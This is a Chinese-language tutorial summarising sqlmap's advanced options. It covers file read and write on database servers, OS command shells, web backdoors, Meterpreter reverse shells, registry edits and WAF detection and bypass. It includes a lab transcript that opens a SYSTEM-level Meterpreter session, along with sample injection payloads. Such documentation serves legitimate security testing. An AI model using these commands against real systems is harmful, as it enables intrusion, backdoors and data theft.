其他高級

用戶自定義函數註入

參數：–udf-inject,–shared-lib

你可以通過編譯MySQL註入你自定義的函數（UDFs）或PostgreSQL在windows中共享庫，DLL，或者Linux/Unix中共享對象，

sqlmap將會問你一些問題，上傳到服務器數據庫自定義函數，然後根據你的選擇執行他們，當你註入完成後，sqlmap將會移除它們。

系統文件操作

從數據庫服務器中讀取文件

參數：–file-read

當數據庫為MySQL，PostgreSQL或Microsoft SQLServer，並且當前用戶有權限使用特定的函數。讀取的文件可以是文本也可以是二進制文件。

把文件上傳到數據庫服務器中

參數：–file-write,–file-dest

當數據庫為MySQL，PostgreSQL或Microsoft SQLServer，並且當前用戶有權限使用特定的函數。上傳的文件可以是文本也可以是二進制文件。

運行任意操作系統命令

參數：–os-cmd,–os-shell

當數據庫為MySQL，PostgreSQL或Microsoft SQL Server，並且當前用戶有權限使用特定的函數。

在MySQL、PostgreSQL，sqlmap上傳一個二進制庫，包含用戶自定義的函數，sys_exec()和sys_eval()。

那麽他創建的這兩個函數可以執行系統命令。在Microsoft SQLServer，sqlmap

如果被禁（在Microsoft SQL Server2005及以上版本默認禁制），sqlmap會重新啟用它，如果不存在，會自動創建。

用–os-shell參數也可以模擬一個真實的shell，可以輸入你想執行的命令。

當不能執行多語句的時候（比如php或者asp的後端數據庫為MySQL時），仍然可能使用INTOOUTFILE寫進可寫目錄，來創建一個web後門。支持的語言：

1、ASP

2、ASP.NET

3、JSP

4、PHP

Meterpreter配合使用

參數：–os-pwn,–os-smbrelay,–os-bof,–priv-esc,–msf-path,–tmp-path

當數據庫為MySQL，PostgreSQL或Microsoft SQLServer，並且當前用戶有權限使用特定的函數，可以在數據庫與攻擊者直接建立TCP連接，

這個連接可以是一個交互式命令行的Meterpreter會話，sqlmap根據Metasploit生成shellcode，並有四種方式執行它：

1. 通過用戶自定義的sys_bineval()函數在內存中執行Metasplit的shellcode，支持MySQL和PostgreSQL數據庫，參數：--os-pwn。

2. 通過用戶自定義的函數上傳一個獨立的payload執行，MySQL和PostgreSQL的sys_exec()函數，Microsoft SQL Server的xp_cmdshell()函數，參數：--os-pwn。

3. 通過SMB攻擊(MS08-068)來執行Metasploit的shellcode，當sqlmap獲取到的權限足夠高的時候（Linux/Unix的uid=0，Windows是Administrator），--os-smbrelay。

4. 通過溢出Microsoft SQL Server 2000和2005的sp_replwritetovarbin存儲過程(MS09-004)，在內存中執行Metasploit的payload，參數：--os-bof

列舉一個MySQL例子：

$ python sqlmap.py -u
"http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn
--msf-path /software/metasploit
[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
\>
[hh:mm:32] [INFO] testing if current user is DBA
[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
\>
[hh:mm:33] [INFO] checking if UDF ‘sys_bineval‘ already exist
[hh:mm:33] [INFO] checking if UDF ‘sys_exec‘ already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF ‘sys_bineval‘ from the binary UDF file
[hh:mm:34] [INFO] creating UDF ‘sys_exec‘ from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database
underlying
operating system?
[1] Via UDF ‘sys_bineval‘ (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
\>
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on
all ports
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
\>
which is the local address? [192.168.136.1]
which local port number do you want to use? [60641]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
\>
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally,
please wait..
\_
\| \| o
\_ \_ \_ \_ \_\|\_ \__, , \_ \| \| \_\_ \_\|\_
/ \|/ \|/ \| \|/ \| / \| / \\_\|/ \\_\|/ / \\_\| \|
\| \| \|_/\|__/\|_/\\_/\|_/ \\/ \|__/ \|__/\\__/ \|_/\|_/
/\|
\\\|
=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
\+ -- --=[ 674 exploits - 351 auxiliary
\+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12272 updated 4 days ago (2011.04.07)
PAYLOAD =\> windows/meterpreter/reverse_tcp
EXITFUNC =\> thread
LPORT =\> 60641
LHOST =\> 192.168.136.1
[\*] Started reverse handler on 192.168.136.1:60641
[\*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF
‘sys_bineval‘,
please wait..
[\*] Sending stage (749056 bytes) to 192.168.136.129
[\*] Meterpreter session 1 opened (192.168.136.1:60641 -\>
192.168.136.129:1689) at Mon Apr 11
hh:mm:52 +0100 2011
meterpreter \> Loading extension espia...success.
meterpreter \> Loading extension incognito...success.
meterpreter \> [-] The ‘priv‘ extension has already been loaded.
meterpreter \> Loading extension sniffer...success.
meterpreter \> System Language : en_US
OS : Windows .NET Server (Build 3790, Service Pack 2).
Computer : W2K3R2
Architecture : x86
Meterpreter : x86/win32
meterpreter \> Server username: NT AUTHORITY\\SYSTEM
meterpreter \> ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:fc:79:39
IP Address : 192.168.136.129
Netmask : 255.255.255.0
meterpreter \> exit
[\*] Meterpreter session 1 closed. Reason: User exit

默認情況下MySQL在Windows上以SYSTEM權限運行，PostgreSQL在Windows與Linux中是低權限運行，

Microsoft SQL Server 2000默認是以SYSTEM權限運行與2008大部分是以NETWORK SERVICE有時是LOCAL SERVICE。

對Windows註冊表操作

當數據庫為MySQL，PostgreSQL或Microsoft SQL Server，並且當前web應用支持堆查詢。當然，當前連接數據庫的用戶也需要有權限操作註冊表。

讀取註冊表值

參數：–reg-read

寫入註冊表值

參數：–reg-add

刪除註冊表值

參數：–reg-del

註冊表輔助選項

參數：–reg-key，–reg-value，–reg-data，–reg-type

需要配合之前三個參數使用，例子：

\$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1
--reg-add --reg-key="HKEY_LOCAL_MACHINE\\SOFTWARE\\sqlmap" --reg-value=Test
--reg-type=REG_SZ --reg-data=1

常規參數

從sqlite中讀取session

參數：-s

sqlmap對每一個目標都會在output路徑下自動生成一個SQLite文件，如果用戶想指定讀取的文件路徑，就可以用這個參數。

保存HTTP(S)日誌

參數：-t

這個參數需要跟一個文本文件，sqlmap會把HTTP(S)請求與響應的日誌保存到那裏。

非交互模式

參數：–batch

用此參數，不需要用戶輸入，將會使用sqlmap提示的默認值一直運行下去。

強制使用字符編碼

參數：–charset

不使用sqlmap自動識別的（如HTTP頭中的Content-Type）字符編碼，強制指定字符編碼如：

–charset=GBK

爬行網站URL
參數：–crawl

sqlmap可以收集潛在的可能存在漏洞的連接，後面跟的參數是爬行的深度。

例子：

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3
[...]
[xx:xx:53] [INFO] starting crawler
[xx:xx:53] [INFO] searching for links with depth 1
[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
[xx:xx:53] [INFO] searching for links with depth 2
[xx:xx:54] [INFO] heuristics detected web page charset ‘ascii‘
[xx:xx:00] [INFO] 42/56 links visited (75%)
[...]

規定輸出到CSV中的分隔符

參數：–csv-del

當dump保存為CSV格式時（–dump-format=CSV），需要一個分隔符默認是逗號，用戶也可以改為別的
如：

–csv-del=”;”

DBMS身份驗證

參數：–dbms-cred

某些時候當前用戶的權限不夠，做某些操作會失敗，如果知道高權限用戶的密碼，可以使用此參數，有的數據庫有專門的運行機制，

可以切換用戶如MicrosoftSQL Server的OPENROWSET函數

定義dump數據的格式

參數：–dump-format

輸出的格式可定義為：CSV，HTML，SQLITE

預估完成時間

參數：–eta

可以計算註入數據的剩余時間。

例如Oracle的布爾型盲註：

$ python sqlmap.py -u
"http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta
[...]
[hh:mm:01] [INFO] the back-end DBMS is Oracle
[hh:mm:01] [INFO] fetching banner
[hh:mm:01] [INFO] retrieving the length of query output
[hh:mm:01] [INFO] retrieved: 64
17% [========\> ] 11/64 ETA 00:19

然後：
100% [===================================================] 64/64
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release
10.2.0.1.0 - Prod
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner: ‘Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod‘
sqlmap先輸出長度，預計完成時間，顯示百分比，輸出字符

刷新session文件

參數：–flush-session

如果不想用之前緩存這個目標的session文件，可以使用這個參數。
會清空之前的session，重新測試該目標。

自動獲取form表單測試

參數：–forms

如果你想對一個頁面的form表單中的參數測試，可以使用-r參數讀取請求文件，或者通過–data參數測試。
但是當使用–forms參數時，sqlmap會自動從-u中的url獲取頁面中的表單進行測試。

忽略在會話文件中存儲的查詢結果

參數：–fresh-queries

忽略session文件保存的查詢，重新查詢。

使用DBMS的hex函數

參數：–hex

有時候字符編碼的問題，可能導致數據丟失，可以使用hex函數來避免：

針對PostgreSQL例子：

$ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1"
--banner --hex -v 3 --parse-errors
[...]
[xx:xx:14] [INFO] fetching banner
[xx:xx:14] [PAYLOAD] 1 AND
5849=CAST((CHR(58)\|\|CHR(118)\|\|CHR(116)\|\|CHR(106)\|\|CHR(58))\|\|(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION()
AS
CHARACTER(10000)),(CHR(32)))),(CHR(85)\|\|CHR(84)\|\|CHR(70)\|\|CHR(56))),(CHR(72)\|\|CHR(69)\|\|CHR(88))))::text\|\|(CHR(58)\|\|CHR(110)\|\|CHR(120)\|\|CHR(98)\|\|CHR(58))
AS NUMERIC)
[xx:xx:15] [INFO] parsed error message: ‘pg_query() [\<a
href=‘function.pg-query‘\>function.pg-query\</a\>]: Query failed: ERROR: invalid
input syntax for type numeric:
":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:"
in \<b\>/var/www/sqlmap/libs/pgsql.inc.php\</b\> on line \<b\>35\</b\>‘
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by
GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
[...]

自定義輸出的路徑

參數：–output-dir

sqlmap默認把session文件跟結果文件保存在output文件夾下，用此參數可自定義輸出路徑
例如：–output-dir=/tmp

從響應中獲取DBMS的錯誤信息

參數：–parse-errors

有時目標沒有關閉DBMS的報錯，當數據庫語句錯誤時，會輸出錯誤語句，用詞參數可以會顯出錯誤信息。

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1"
--parse-errors
[...]
[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending
the range for current UNION query injection technique test
[11:12:17] [INFO] parsed error message: ‘Microsoft OLE DB Provider for ODBC
Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10
is out of range of the number of items in the select list.
\<b\>/sqlmap/mssql/iis/get_int.asp, line 27\</b\>‘
[11:12:17] [INFO] parsed error message: ‘Microsoft OLE DB Provider for ODBC
Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is
out of range of the number of items in the select list.
\<b\>/sqlmap/mssql/iis/get_int.asp, line 27\</b\>‘
[11:12:17] [INFO] parsed error message: ‘Microsoft OLE DB Provider for ODBC
Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is
out of range of the number of items in the select list.
\<b\>/sqlmap/mssql/iis/get_int.asp, line 27\</b\>‘
[11:12:17] [INFO] target URL appears to have 3 columns in query
[...]

其他的一些參數

使用參數縮寫

參數：-z

有使用參數太長太復雜，可以使用縮寫模式。 例如：

python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u
"www.target.com/vuln.php?id=1"

可以寫成：

python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"

還有：

python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb
-T users -u "www.target.com/vuln.php?id=1"

可以寫成：

python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u
"www.target.com/vuln.php?id=1"

成功SQL註入時警告

參數：–alert

設定會發的答案

參數：–answers

當希望sqlmap提出輸入時，自動輸入自己想要的答案可以使用此參數： 例子：

$ python sqlmap.py -u
"http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--technique=E
--answers="extending=N" --batch
[...]
[xx:xx:56] [INFO] testing for SQL injection on GET parameter ‘id‘
heuristic (parsing) test showed that the back-end DBMS could be ‘MySQL‘. Do you
want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to include all tests for ‘MySQL‘ extending
provided level (1) and risk (1)? [Y/n] N
[...]

發現SQL註入時發出蜂鳴聲

參數：–beep

發現sql註入時，發出蜂鳴聲。

啟發式檢測WAF/IPS/IDS保護

參數：–check-waf

WAF/IPS/IDS保護可能會對sqlmap造成很大的困擾，如果懷疑目標有此防護的話，可以使用此參數來測試。sqlmap將會使用一個不存在的參數來註入測試

例如：

&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables
WHERE 2>1

如果有保護的話可能返回結果會不同。

清理sqlmap的UDF(s)和表

參數：–cleanup

清除sqlmap註入時產生的udf與表。

禁用彩色輸出

參數：–disable-coloring

sqlmap默認彩色輸出，可以使用此參數，禁掉彩色輸出。

使用指定的Google結果頁面

參數：–gpage

默認sqlmap使用前100個URL地址作為註入測試，結合此選項，可以指定頁面的URL測試。

使用HTTP參數汙染

參數：-hpp

HTTP參數汙染可能會繞過WAF/IPS/IDS保護機制，這個對ASP/IIS與ASP.NET/IIS平臺很有效。

測試WAF/IPS/IDS保護

參數：–identify-waf

sqlmap可以嘗試找出WAF/IPS/IDS保護，方便用戶做出繞過方式。目前大約支持30種產品的識別。

例如對一個受到ModSecurity WAF保護的MySQL例子：

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1"
--identify-waf -v 3
[...]
[xx:xx:23] [INFO] testing connection to the target URL
[xx:xx:23] [INFO] heuristics detected web page charset ‘ascii‘
[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘USP Secure Entry Server
(United Security Providers)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘BinarySEC Web Application
Firewall (BinarySEC)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘NetContinuum Web
Application Firewall (NetContinuum/Barracuda Networks)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Hyperguard Web Application
Firewall (art of defence Inc.)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Cisco ACE XML Gateway
(Cisco Systems)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘TrafficShield (F5
Networks)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Teros/Citrix Application
Firewall Enterprise (Teros/Citrix Systems)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘KONA Security Solutions
(Akamai Technologies)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Incapsula Web Application
Firewall (Incapsula/Imperva)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘CloudFlare Web Application
Firewall (CloudFlare)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Barracuda Web Application
Firewall (Barracuda Networks)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘webApp.secure (webScurity)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Proventia Web Application
Security (IBM)‘
[xx:xx:23] [DEBUG] declared web page charset ‘iso-8859-1‘
[xx:xx:23] [DEBUG] page not found (404)
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘KS-WAF (Knownsec)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘NetScaler (Citrix Systems)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Jiasule Web Application
Firewall (Jiasule)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘WebKnight Application
Firewall (AQTRONIX)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘AppWall (Radware)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘ModSecurity: Open Source
Web Application Firewall (Trustwave)‘
[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified ‘ModSecurity: Open Source Web
Application Firewall (Trustwave)‘. Please consider usage of tamper scripts
(option ‘--tamper‘)
[...]

模仿智能手機

參數：–mobile

有時服務端只接收移動端的訪問，此時可以設定一個手機的User-Agent來模仿手機登陸。

例如：

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
\> 1
[...]

安全的刪除output目錄的文件

參數：–purge-output

有時需要刪除結果文件，而不被恢復，可以使用此參數，原有文件將會被隨機的一些文件覆蓋。

例如：

$ python sqlmap.py --purge-output -v 3
[...]
[xx:xx:55] [INFO] purging content of directory ‘/home/user/sqlmap/output‘...
[xx:xx:55] [DEBUG] changing file attributes
[xx:xx:55] [DEBUG] writing random data to files
[xx:xx:55] [DEBUG] truncating files
[xx:xx:55] [DEBUG] renaming filenames to random values
[xx:xx:55] [DEBUG] renaming directory names to random values
[xx:xx:55] [DEBUG] deleting the whole directory tree
[...]

啟發式判斷註入

參數：–smart

有時對目標非常多的URL進行測試，為節省時間，只對能夠快速判斷為註入的報錯點進行註入，可以使用此參數。

例子：

$ python sqlmap.py -u
"http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch
--smart
[...]
[xx:xx:14] [INFO] testing if GET parameter ‘ca‘ is dynamic
[xx:xx:14] [WARNING] GET parameter ‘ca‘ does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter ‘ca‘ might
not be injectable
[xx:xx:14] [INFO] skipping GET parameter ‘ca‘
[xx:xx:14] [INFO] testing if GET parameter ‘user‘ is dynamic
[xx:xx:14] [WARNING] GET parameter ‘user‘ does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter ‘user‘
might not be injectable
[xx:xx:14] [INFO] skipping GET parameter ‘user‘
[xx:xx:14] [INFO] testing if GET parameter ‘id‘ is dynamic
[xx:xx:14] [INFO] confirming that GET parameter ‘id‘ is dynamic
[xx:xx:14] [INFO] GET parameter ‘id‘ is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter ‘id‘ might be
injectable (possible DBMS: ‘MySQL‘)
[xx:xx:14] [INFO] testing for SQL injection on GET parameter ‘id‘
heuristic (parsing) test showed that the back-end DBMS could be ‘MySQL‘. Do you
want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for ‘MySQL‘ extending provided level (1) and
risk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing ‘AND boolean-based blind - WHERE or HAVING clause‘
[xx:xx:14] [INFO] GET parameter ‘id‘ is ‘AND boolean-based blind - WHERE or
HAVING clause‘ injectable
[xx:xx:14] [INFO] testing ‘MySQL \>= 5.0 AND error-based - WHERE or HAVING
clause‘
[xx:xx:14] [INFO] GET parameter ‘id‘ is ‘MySQL \>= 5.0 AND error-based - WHERE
or HAVING clause‘ injectable
[xx:xx:14] [INFO] testing ‘MySQL inline queries‘
[xx:xx:14] [INFO] testing ‘MySQL \> 5.0.11 stacked queries‘
[xx:xx:14] [INFO] testing ‘MySQL \< 5.0.12 stacked queries (heavy query)‘
[xx:xx:14] [INFO] testing ‘MySQL \> 5.0.11 AND time-based blind‘
[xx:xx:24] [INFO] GET parameter ‘id‘ is ‘MySQL \> 5.0.11 AND time-based blind‘
injectable
[xx:xx:24] [INFO] testing ‘MySQL UNION query (NULL) - 1 to 20 columns‘
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection
technique tests as there is at least one other potential injection technique
found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending
the range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter ‘id‘ is ‘MySQL UNION query (NULL) - 1 to 20
columns‘ injectable
[...]

初級用戶向導參數

參數：–wizard面向初級用戶的參數，可以一步一步教你如何輸入針對目標註入。

參考資料：

安全牛課堂-kali-linux-web篇

sqlmap用戶手冊中文版：https://octobug.gitbooks.io/sqlmap-wiki-zhcn/content/Users-manual/Introduction.html

sqlmap用戶手冊：http://drops.xmd5.com/static/drops/tips-143.htm

SQLmap使用手冊小結（二）